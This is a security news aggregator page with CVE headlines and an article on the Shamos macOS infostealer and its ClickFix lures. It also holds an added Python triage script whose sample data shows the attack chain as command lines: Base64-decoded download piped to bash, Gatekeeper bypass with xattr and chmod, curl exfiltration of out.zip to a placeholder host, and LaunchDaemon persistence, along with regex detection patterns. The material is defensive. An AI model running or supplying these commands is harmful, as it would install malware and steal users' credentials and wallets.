Aggregator
CVE-2025-0084 | Google Android 13/14/15 Bluetooth out-of-bounds write
CVE-2025-0075 | Google Android 15 sdp_server.cc process_service_search_attr_req use after free
CVE-2025-22411 | Google Android 15 sdp_discovery.cc process_service_attr_rsp use after free
CVE-2025-22403 | Google Android 15 sdp_discovery.cc sdp_snd_service_search_req use after free
CVE-2025-0074 | Google Android 15 sdp_discovery.cc process_service_attr_rsp use after free
The One Where We Just Steal The Vulnerabilities (CrushFTP CVE-2025-54309)
China-based Threat Actor Mustang Panda’s Tactics, Techniques, and Procedures Unveiled
China-based threat actor Mustang Panda has emerged as one of the most sophisticated cyber espionage groups operating in the current threat landscape, with operations dating back to at least 2014. This advanced persistent threat (APT) group has systematically targeted government entities, nonprofit organizations, religious institutions, and NGOs across the United States, Europe, Mongolia, Myanmar, Pakistan, […]
What CISOs can learn from Doppel’s new AI-driven social engineering simulation
Doppel has introduced a new product called Doppel Simulation, which expands its platform for defending against social engineering. The tool uses autonomous AI agents to create multi-channel simulations that mirror how attackers operate across email, SMS, messaging apps, and soon voice. The goal is to move beyond legacy phishing tests that rely on email click rates and instead measure resilience across a broader set of real-world attack paths. For CISOs, the launch represents a shift …
107 remote commands and full-screen "encryption" notices. The HOOK banking trojan has turned into a universal weapon for hackers
Securden Unified PAM Vulnerability Let Attackers Bypass Authentication
Cybersecurity researchers have uncovered a critical security flaw in Securden Unified PAM that allows attackers to completely bypass authentication mechanisms and gain unauthorized access to sensitive credentials and system functions. The vulnerability, designated as CVE-2025-53118 with a CVSS score of 9.4, represents one of four serious security issues discovered in the privileged access management solution […]
JVN: Improper input validation vulnerability in multiple Schneider Electric products
Social media apps that aggressively harvest user data
Both domestic and foreign technology companies collect vast amounts of Americans' personal data through mobile applications, according to Incogni. Some apps leverage data for marketing and advertising purposes, feeding algorithms that calculate optimal prices based on consumer behavior, often leading to unwanted spending. Other apps share user data with unnamed third parties, increasing the risk of breaches with every additional recipient. Additionally, there is the threat of government appropriation of this data. Recently, foreign-owned apps …
They were promised a "smart city" and convenient transport, but got chaos. The culprit: a cyberattack
Fake macOS fixes trick users into installing the new Shamos infostealer
A new information-stealing malware named "Shamos" is targeting Mac devices, using "ClickFix" attacks in which the lure is disguised as a troubleshooting guide or fix.
The malware is a variant of Atomic macOS Stealer (AMOS), developed by the cybercrime group "COOKIE SPIDER", and is used to steal data and credentials stored in web browsers, Keychain items, Apple Notes, and cryptocurrency wallets.
CrowdStrike, which discovered Shamos, reports that since June 2025 the malware has attempted to infect more than 300 of the environments it monitors worldwide.
Distribution via ClickFix attacks
Victims are lured through malicious advertisements or fake GitHub repositories; both use the ClickFix technique to trick users into executing shell commands in the macOS Terminal.
The threat actors urge users to run these commands to "install software" or "fix" a fabricated error, but once executed the commands actually download and run the malware on the device.
Malicious GitHub repository
The ads or fake pages (such as mac-safer[.]com and rescue-mac[.]com) claim to resolve macOS problems the user may have searched for, and include instructions to copy and paste a command to "fix the problem".
Malicious sponsored results on Google Search
The commands do not fix anything. Instead, they decode a Base64-encoded URL and fetch a malicious Bash script from a remote server.
Fake instructions for fixing printer issues on macOS
The script captures the user's password, downloads the Shamos Mach-O executable, and bypasses Gatekeeper by using "xattr" to remove the quarantine attribute and "chmod" to make the binary executable, then prepares and launches the malware.
Shamos data theft
Once running on the device, Shamos first executes anti-VM commands to confirm it is not in a sandbox, then performs host reconnaissance and data collection via AppleScript commands.
It searches the device for sensitive data, including cryptocurrency wallet files, Keychain data, Apple Notes data, and information stored in the victim's browsers.
After collecting everything, it packages the data into an archive named "out.zip" and transmits it to the attackers with curl.
If the malware is running with sudo privileges, it also creates a Plist file (com.finder.helper.plist) in the LaunchDaemons directory so that it executes automatically at system startup, giving it persistence.
CrowdStrike also noted that Shamos can download additional payloads into the victim's home directory, and threat actors have been observed dropping a fake Ledger Live wallet application and a botnet module.
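One way to hunt for this chain in shell history or EDR process-command telemetry, as an added example that is not part of the original article or CrowdStrike's tooling: the script below flags the indicators the text describes (a Base64 blob that decodes to a URL, a download or decode piped straight into a shell, removal of the com.apple.quarantine attribute, chmod setting the execute bit, a curl upload of out.zip, and the com.finder.helper.plist LaunchDaemon). The command lines it scans are constructed for the example, and example.invalid is a placeholder host, not an indicator from the report.

```python
"""ClickFix / Shamos command-line triage (added example, not the article's or
CrowdStrike's code). Each regex maps to one step of the infection chain the
article describes. All sample command lines and hosts below are constructed."""
import base64
import re
from dataclasses import dataclass, field

PERSISTENCE_PLIST = "com.finder.helper.plist"   # LaunchDaemon name from the article
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL_RE = re.compile(r"^https?://[\w.\-]+", re.IGNORECASE)

# (indicator name, pattern) in infection-chain order
INDICATORS = [
    ("download_piped_to_shell",          # curl ... | bash
     re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")),
    ("base64_decode_piped_to_shell",     # echo <blob> | base64 -d | bash
     re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")),
    ("quarantine_attr_removed",          # xattr -d com.apple.quarantine / xattr -c
     re.compile(r"\bxattr\s+(?:-\w+\s+)*?(?:-\w*d\w*\s+com\.apple\.quarantine|-\w*c\w*\b)")),
    ("chmod_exec_bit",                   # chmod +x or an octal mode with owner exec
     re.compile(r"\bchmod\s+(?:-R\s+)?(?:[ugoa]*\+[rw]*x|[0-7]?[1357][0-7]{2}\b)")),
    ("curl_upload_out_zip",              # exfil archive name reported in the article
     re.compile(r"\bcurl\b[^|;&]*out\.zip")),
    ("launchdaemon_persistence",
     re.compile(r"com\.finder\.helper\.plist|launchctl\s+(?:load|bootstrap)\b[^|;&]*/LaunchDaemons/")),
]


def decoded_urls(cmd):
    """Return the http(s) URLs hidden in Base64 blobs of a command line.

    This is the ClickFix trick of hiding the stager's address from the victim:
    the pasted one-liner decodes the URL only at run time."""
    urls = []
    for blob in B64_RE.findall(cmd):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):   # not base64, or not text
            continue
        if URL_RE.match(text.strip()):
            urls.append(text.strip())
    return urls


@dataclass
class Verdict:
    command: str
    indicators: list = field(default_factory=list)
    urls: list = field(default_factory=list)

    @property
    def suspicious(self):
        return bool(self.indicators)


def analyze(cmd):
    """Score one command line against every indicator."""
    v = Verdict(cmd, urls=decoded_urls(cmd))
    if v.urls:
        v.indicators.append("base64_url")
    for name, rx in INDICATORS:
        if rx.search(cmd):
            v.indicators.append(name)
    return v


def triage(lines):
    """Return only the suspicious verdicts for a batch of command lines."""
    return [v for v in (analyze(line) for line in lines) if v.suspicious]


# Constructed samples (example.invalid is a reserved placeholder host).
STAGER_B64 = base64.b64encode(b"https://example.invalid/stage.sh").decode()
SAMPLE_COMMANDS = [
    # 1. the one-liner a fake "fix" page tells the victim to paste into Terminal
    f'echo "{STAGER_B64}" | base64 -d | bash',
    # 2. what the fetched script does to the dropped Mach-O to get past Gatekeeper
    "xattr -d com.apple.quarantine /tmp/.update && chmod +x /tmp/.update && /tmp/.update",
    # 3. exfiltration of the collected archive
    'curl -s -F "file=@/tmp/out.zip" https://example.invalid/upload',
    # 4. persistence when the stealer runs under sudo
    "cp /tmp/com.finder.helper.plist /Library/LaunchDaemons/ && launchctl load /Library/LaunchDaemons/com.finder.helper.plist",
    # 5-6. ordinary admin activity that must not fire
    "brew install wget",
    "xattr -l ~/Downloads/installer.dmg",
]

if __name__ == "__main__":
    for v in triage(SAMPLE_COMMANDS):
        print(v.indicators, v.urls, v.command[:70])
```

The Base64 check is the useful part: a blob that decodes to a URL on a user-typed command line is rare in legitimate use, and the decoded host is what you pivot on when blocking or hunting across other endpoints. Keep the `xattr -l` and `brew` cases in any rule set you build from this, so listing attributes or ordinary installs does not page anyone.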
Advice for macOS users
macOS users should never run a command on their system unless they fully understand what it does. The same caution applies to GitHub repositories: the platform hosts many malicious projects whose sole purpose is to infect unsuspecting users.
When something goes wrong on macOS, avoid clicking sponsored search results. Instead, seek help in the Apple-moderated Apple Community forums or through the system's built-in Help feature (press Cmd + Space and type "Help").
ClickFix has become a widely used tactic for delivering malware. Threat actors have embedded it in TikTok videos, disguised it as a CAPTCHA, and presented it as a "fix" for fake Google Meet errors.
The tactic has proven extremely effective for malware deployment and has already been used in ransomware attacks.